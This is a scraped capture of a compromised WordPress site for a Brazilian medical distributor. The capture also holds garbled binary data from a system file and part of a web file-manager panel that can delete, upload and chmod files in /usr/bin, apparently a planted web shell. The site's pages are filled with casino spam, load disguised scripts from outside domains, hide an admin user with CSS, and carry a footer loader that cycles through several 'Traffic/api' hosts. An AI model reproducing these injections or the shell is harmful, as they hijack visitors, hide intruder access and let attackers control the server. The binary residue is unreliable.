(A ABBF     �  �&gt;���    ]�Y�b� 8   �  `?���    B�B�D �C(�D`�
(A ABBA      �?���    S�i�d� 4   8  d@��y    B�E�D �A(�D0b(A ABB,   p  �@���    F�k
GI
GI
GA   8   �  \A���    B�I�I �M(�I0�e
(A BBBJ   �  �A���       d   �  &lt;B��    B�B�B �B(�A0�A8�D��
8A0A(B BBBE�
8C0A(B BBBA 0   X	  �G���    B�A�C �DP�
 AABD    �	  �H��9    A�p   D   �	  �H��G   B�D�D �J
ABIp
FBHR
ABK  $   �	  �J��   B�J�
BA   H   
  �K��7   B�B�B �B(�A0�A8�D@
8D0A(B BBBH        zR x�@������   (   4�
       $   �
  `O���   B�J�
BH   `   �
  �P���   B�B�D �D(�D0�
(A ABBDC
(A ABBGD
(A ABBA   $   (  dS��   B�J�
BA       P  \T��   B�J��
BAh   t  HU��   A�A�G v
AAG
CAE�
CAIN
AAHR
AAL}
AAI     �  �W��[   D��
A   L      &lt;Y��   B�E�F �E(�A0�C8�J�]
8A0A(B BBBA   H   P  d��-   B�E�E �B(�A0�G8�D`�
8A0A(B BBBA L   �  �d��U   B�B�B �B(�A0�A8�G��
8A0A(B BBBB   H   �   h��    B�E�B �B(�A0�A8�G��
8A0A(B BBBDH   8  �i���   B�B�E �B(�A0�A8�D�F
8A0A(B BBBA@   �  Hm���    B�B�B �B(�A0�G@�
0A(B BBBA d   �  �m��l(   B�B�B �B(�A0�A8�G�
8A0A(B BBBH�
8H0A(B BBBJ H   0  ���   B�E�B �B(�A0�A8�D`7
8A0A(B BBBF    |  p����   G�~
K�
Q4   �  &lt;���	   A�A�D �
AACT
FAE$   �  ���v    G�~
KA
OK         l����    pfRc        ���1   F�B�B �B(�D0�E8�G�z
�_�O�A�,�Z�E�A�]�G�b�N�B�~�G�O�A���_�W�B���I�X�A��L�X�A���H�Y�A�U�H�P�B�y�O�l�B��
�A�E�
�I�ET
�B�Ey
�B�E                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           `X       X      P\                         #                            �             @\                          H\                   ���o    �             0	             �      
       o                                          X^            8                           X             �             �      	                             ���o          ���o          ���o           �o    �      ���o    &gt;                                                                                       X\                     0       @       P       `       p       �       �       �       �       �       �       �       �        !      !       !      0!      @!      P!      `!      p!      �!      �!      �!      �!      �!      �!      �!      �!       &quot;      &quot;       &quot;      0&quot;      @&quot;      P&quot;      `&quot;      p&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;      �&quot;                                                  ����                        ��      ��      (�      h�      ��      �      (�      h�      ��      �      �      P�      ��      �      �      (�      h�      ��      �      (�      h�      
�      ��      �      �      (�      h�      ��      �      (�      h�      ��      �      @�      ��      ��       �      @�      p�      ��      ��      8�      x�      ��       �      @�                      �              �d            &#039;�                      h       ,�                      i       8�              �d            @�              �d            F�              �d            O�                      v       W�              �d                                                     GA$3a1         �W               GA$3g1050  �%      �                GA*              GA$annobin gcc 11.2.1 20211203           GA$plugin name: annobin               GA$running gcc 11.2.1 20211203 	          GA*                GA*             GA!              GA*FORTIFY �              GA+GLIBCXX_ASSERTIONS             GA*GOW j            GA*cf_protection             GA+omit_frame_pointer             GA+stack_clash           GA$3a1 �W      �              GA*FORTIFY �    pX      �               GA+GLIBCXX_ASSERTIONS   bc-1.07.1-14.el9.x86_64.debug   &gt;DwT�7zXZ  �ִF !   t/���] ?�E�h=��ڊ�2N��h5^ �/2\I��SXE���o�O�s�t�?6�vf�E�W01���?ڶ�A��B�Bǥ�kKdGʫUo�}C��,,_���P`V�#Sޜ�A�^�u;�&gt;�45�������,�&quot;�ZD�&lt;��A~|�F���x�;y`��iɃ��//��L�F�;G�8{�Q�܏�Эsȫ��.��&lt;����&#039;�F�������v��J�DS���P#pчm�D����p��#m%Gf�e�����i_�	((�S
Sl�I��xs��&amp;k��1�	�2y�T�L��iK�C�X�s%�� �,�1����#������������*�--�m�
OY�㝎�#^�� �UI�7�{A7A��2_��wb�����`�C8�1b7��fgsoO��mW(�p�Kd���W�8i�����K$阰|r��3	i�(�|��f���;��=ΐY̘l�,/ƾ�c�^D̚p�z�FY	��j쨥��|�x���	�:3��m�MHL�	�݀�:�O��c� ��#k����B���bd�&#039;�W��O���}Z ��rkN�.��B]�C��i�q6?yTJ�Y�WG+�ؕ��w�&gt;;\꼸�Z��=Z��bƕ}���H�Գ�~����#5Yd�����|Ip���١!�8��*x7	�����n�JǙJ�b����F-��}��$�&lt;p㳀�&quot;�)zlq��7&#039;h�	0R��ڛ��&amp;&lt;z��6`�-&#039;���9���В�5A&quot;��k����ƿ	K��7����D&gt;kHI�h
�?�HF!�)�����8S;���-h�k0�m�����0��&gt;�D��:&lt;�z���d�q%���Qm2�~��j�q�༼|RQ&amp;6IR�B{�O9�z��]��-�f��JC%1,2s�楣&amp;
5Nz�A+�=/��+��:]g!�ܫ�b����W�S&amp;p�
��&amp;�֙�	�0�֟��v���69B�%�0t�춊�!�̯������e��Y3,d�:Њ!�V�/����Ku�7��Jb*��:�l]ـ&#039;Z{�%m��-w9RsƋ+�˟$��c��ӗ�󔕋ˁ���t�\U�Lջt8���cC(W M�19���L����-?i�A��f#�i�ʹ��P1:{{��.�Е���� }����(`��g*����@�p��&lt;����~S�����f] G��~�ɅX�PA�u��-$aq�������2*�G�e+T9��&lt;8=`l��?�GM L,�.|dS��f��e�׳q���f:�L�n�c��ul��cx��d��4����-�w�vN��Q�4Pp��F�K.
�o��0Ð���)n��I���;��0��R��c�Hr��)�9:�K�5��qȼ�/����M�pS����&lt;�R*���ɴ��Җb� ��+���\�:�t�SONO���r�D�~f�St�Ofs�9m�%����~ ��� ����Լ��K��O�&quot;S�&quot;�$���IYκ�~,E��}�3T؆��璝������e_D�����8Tv}�~���Pb��KkL��$8�b��4ʤ��v+��&#039;�=��#�A��m�Uk_1�&quot;��1�@t���l���/P�h)��b���\�[YpN�&amp;�X�  �_		�+u ��3  ޞ9o��g�    YZ .shstrtab .interp .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.sec .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .data.rel.ro .dynamic .got .data .bss .gnu.build.attributes .gnu_debuglink .gnu_debugdata                                                                                                                                       8      8      0                              &amp;             h      h      $                              9             �      �                                     G   ���o       �      �      &lt;                             Q             �      �      @                          Y             0	      0	      o                             a   ���o       �      �      p                            n   ���o                   p                            }             �      �      �                           �      B       X      X      8                          �                                                           �                             �                            �              #       #      �                            �             �%      �%      @�                             �             �      �                                    �              �       �      �L                              �             �,     �,     D                             �             /     /     &lt;                             �             @\     @L                                  �             H\     HL                                  �             P\     PL                                   �             X\     XL                                 �             X^     XN     �                            �              `      P     �                                          �b     �R                                   
     �       ؄     �R     L                                                  U     $                              /                     0U     �                                                   �[     &gt;                             </textarea>
                    <div style="margin-top:15px;display:flex;gap:8px;">
                        <button class="button button-green">Save</button>
                        <a href="?p=%2Fusr%2Fbin" class="button button-red">Cancel</a>
                    </div>
                </form>
            </div>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/usr/bin';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic &#8211; Página: 2</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//nornikal3pi12.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a88b01c56d24*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://nornikal3pi12.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog paged wp-embed-responsive paged-2 wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/scheepsgezagvoerder-kare-plusteken-het-liefste-van-u-dromerij-piratenverhaal-casino333-5-6-klas-avonturenverhaal/">Scheepsgezagvoerder Kare plusteken het Liefste van u Dromerij Piratenverhaal Casino333 5 6 klas Avonturenverhaal</a></h2><p>Grootte Gameplay en ondervinding afwisselend Captai Shark &#8211; Casino333 Gebruiksaanwijzing Arne Afloop Savoir c&#8217;est pouvoir Saul&#8217;s dekking (Diegene ben gij slippen vanuit Saul&#8217;s rok of &#8211; Ploeggenoten lepelen veel diepteloopjes va ben bergkam – overlaps en underlaps – afwisselend tegenstanders absent gedurende ‘trekken’. Inschatten die fragment trainde Fietsslot nadrukkelijk wegens gij voorbereiding. Waarderen finesse slijpt [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/this-step-ensures-that-your-account-is-safe-and-you-possess-offered-precise-information/">This step ensures that your account is safe and you possess offered precise information</a></h2><p>Following such basic steps, you can easily and quickly arranged your web gambling enterprise account and you will dive into the enjoyable arena of online gambling. Regardless if you are prepared in-line otherwise leisurely at your home, mobile compatibility means the brand new adventure from online gambling is always available. They adhere to strict direction [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/premio-privato-di-base-mucchio-adm-nota-permesso-2026/">Premio Privato di Base Mucchio ADM: Nota Permesso 2026</a></h2><p>Content Qual è il miglior gratifica escludendo base? Gratifica escludendo deposito sopra SPID / CIE Chi siamo addirittura gioco sicuro Il bonus compenso è separatamente delle tipologie di bonus scompiglio ad esempio sono divenute piuttosto frequenti negli ultimi anni. La scelta di prendere dietro porzione del stabile perso permette di continuare per agire privato di [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/gratifica-100-50-giri-attualmente/">Gratifica 100%, 50 Giri Attualmente</a></h2><p>Content Ad esempio eseguire un base Ispezione Completa di HoneyBetz Confusione Casinò Live La maniera rientra negli canone di giustizia di nuovo aiuta per riparare il guadagno, ancora uccidere rischi di accessi non autorizzati. Sopra controllo Skiller sito web ufficiale addirittura governo profilo, trattiamo i dati con come garantito addirittura logico verso desktop ancora amovibile. [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/migliori-bisca-online-italiani-puoi-provare-qui-guida-completa-ai-siti-di-gioco-dazzardo/">Migliori Bisca Online Italiani: puoi provare qui Guida Completa Ai Siti Di Gioco D&#8217;Azzardo</a></h2><p>L’ADM (prima AAMS) è l’unico istituzione quale introduce le regole di richiamo per i casino online italiani autorizzati. L’autoesclusione, che può ancora abitare revocata davanti dello deteriorarsi del circostanza, può essere implorazione così dal sito dell’ADM quale immediatamente al casa da gioco con cui ci si registra.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/mucchio-con-spid-2026-annotazione-veloce-topbet24-premio-verificati-adm/">Mucchio con SPID 2026: Annotazione Veloce, Topbet24 Premio verificati ADM</a></h2><p>Content Topbet24: Incontro Digitale &#8211; Premio Casa da gioco: 5.105€, 500 Freespin NetBet scommesse Decine di software providers rinomati Al base si riceve il 100% fino verso 5.000€, ad esempio permette di intensificare l’costo del primo base con i limiti di nuovo le condizioni previste. Inoltre, alla incisione è per di più previsto un fun [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/sprich-so-casinos-aber-und-abermal-alternative-verifizierungsprozesse-vornehmen-damit-sicherzustellen-dass-kaum-illegalen-aktivitaten-ereignen/">Sprich, so Casinos aber und abermal alternative Verifizierungsprozesse vornehmen, damit sicherzustellen, dass kaum illegalen Aktivitaten ereignen</a></h2><p>Alternativ zu tun sein die kunden dies Guthaben aufwarts der Kontoverbindung abgeben. Selbige Zeitlang das Ausschuttung war fur nach Zahlungsmethode differenzierend. Pro Spieler bei europaischen Moglich Casinos eignen einfache Auszahlungen genauso essentiell hinsichtlich Einzahlungen. Entschlusseln Eltern ebendiese Meinungen durch folgenden Spielern unter anderem gibt es so sehr das sinnvolle Moglich Spielcasino Bundesrepublik. Alle weiteren Informations [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/roulette-neu-casino-ein-experte-leitfaden-fur-spieler/">Roulette neu Casino: Ein Experte Leitfaden für Spieler</a></h2><p>Als erfahrener Online-Roulette-Spieler mit 15 Jahren Erfahrung, freue ich mich, Ihnen einen umfassenden Leitfaden zu Roulette neu Casino zu präsentieren. In diesem Artikel werden wir uns mit den Spielregeln, den Vor- und Nachteilen, den Auszahlungen, Tipps und Tricks sowie den besten Online-Casinos für Roulette neu Casino befassen. Spielregeln und Merkmale von Roulette neu Casino Roulette [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/15-superiores-giros-de-balde-acerca-de-casino-codigos-de-bono-carente-deposito-referente-a-2026/">15 superiores giros de balde acerca de casino códigos de bono carente depósito referente a 2026</a></h2><p>Content &#xBF;En qu&#xE9; juegos puedo juguetear sobre casinos en l&#xED;nea con bonos desprovisto dep&#xF3;ubicado? C&#xF3;mo hacen el trabajo bien los 100 giros sin cargo Nuestra experiencia a los cuarenta giros gratuito falto dep&#xF3;emplazado Superiores Bonos de Casino carente Dep&#xF3;ubicado Los bonos sin dep&#xF3;ubicado serán uno de los reclamos m&#xE1;s interesantes en 2026 con el fin [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/21/roulette-with-free-spins-uk-a-comprehensive-guide/">Roulette with Free Spins UK: A Comprehensive Guide</a></h2><p>Are you a fan of online roulette looking to spice up your gameplay with some free spins? Look no further than roulette with free spins UK. In this article, we will explore everything you need to know about this exciting variation of the classic casino game, including how to play, where to play, and tips [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"><a href="https://pblmedic.com/?edit=1&#038;p=%2Fusr%2Fbin&#038;path=%2Fusr%2Fbin%2Fbc" ><span class="meta-nav">&larr;</span> anterior</a></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/3/?edit=1&#038;p=%2Fusr%2Fbin&#038;path=%2Fusr%2Fbin%2Fbc" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
